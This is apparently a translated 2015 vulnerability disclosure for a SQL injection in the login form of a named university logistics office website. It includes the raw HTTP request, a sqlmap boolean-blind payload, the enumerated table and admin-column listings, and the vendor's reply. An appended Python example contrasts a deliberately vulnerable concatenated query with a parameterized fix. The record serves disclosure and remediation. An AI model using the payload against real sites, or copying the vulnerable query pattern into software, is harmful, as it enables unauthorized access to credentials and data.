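2015-11-23: Details reported to the vendor; awaiting vendor handling
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Vendor fixed the vulnerability and disclosed it voluntarily; details released to the public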
As the title says.
http://hqbzc.upc.edu.cn/ China University of Petroleum (East China), Dongying Campus, Logistics Support Office
POST /room/login.asp?action=pass HTTP/1.1
Content-Length: 101
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://hqbzc.upc.edu.cn
Cookie: ASPSESSIONIDAQCQCCQB=LBGLMJLBJJNMPMNABNLNIAHN
Host: hqbzc.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

password=g00dPa%24%24w0rD&username=-1
The username parameter is vulnerable to SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
    Payload: password=g00dPa$$w0rD&username=-6927' OR 1015=1015%16
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[6 tables]
+------------+
| admin      |
| adv        |
| article    |
| content    |
| guestbook  |
| indexation |
+------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
    Payload: password=g00dPa$$w0rD&username=-6927' OR 1015=1015%16
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[5 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| classid  | numeric     |
| id       | numeric     |
| password | non-numeric |
| type     | numeric     |
| username | non-numeric |
+----------+-------------+
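Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-11-23 15:13
Thank you for your attention to the university's network security. We will resolve this issue as soon as possible.
2015-11-30: The system has been taken out of service. Thank you!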
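The flaw reported above, shown beside its fix. This is an added example, not code from the affected site or from the report. It assumes the login handler builds its query by string concatenation, uses an in-memory SQLite database as a stand-in for the Access back end with the admin table columns from the sqlmap output, and swaps the Access-specific trailing comment in the reported payload for SQLite's `--`. The sample row and function names are constructed.

```python
import sqlite3

# Reported payload shape, with SQLite's "--" comment replacing the Access one.
INJECTED_USERNAME = "-6927' OR 1015=1015 --"


def make_db():
    """In-memory stand-in for the 'admin' table listed in the sqlmap output."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE admin (id INTEGER, classid INTEGER, type INTEGER, "
        "username TEXT, password TEXT)"
    )
    # Constructed sample row; the password is a placeholder value. A real
    # system should store a salted password hash, which is out of scope here.
    db.execute(
        "INSERT INTO admin VALUES (1, 0, 0, 'siteadmin', 'constructed-placeholder')"
    )
    return db


def login_concat(db, username, password):
    """Vulnerable pattern: request values are pasted into the SQL text."""
    sql = (
        "SELECT id FROM admin WHERE password = '" + password
        + "' AND username = '" + username + "'"
    )
    return db.execute(sql).fetchone() is not None


def login_param(db, username, password):
    """Hardened pattern: values are bound as parameters, never parsed as SQL."""
    sql = "SELECT id FROM admin WHERE password = ? AND username = ?"
    return db.execute(sql, (password, username)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    for name, check in (("concat", login_concat), ("param", login_param)):
        ok = check(db, INJECTED_USERNAME, "g00dPa$$w0rD")
        print(f"{name}: injected username accepted = {ok}")
```

In classic ASP the same fix is a parameterized ADODB.Command in place of a concatenated query string.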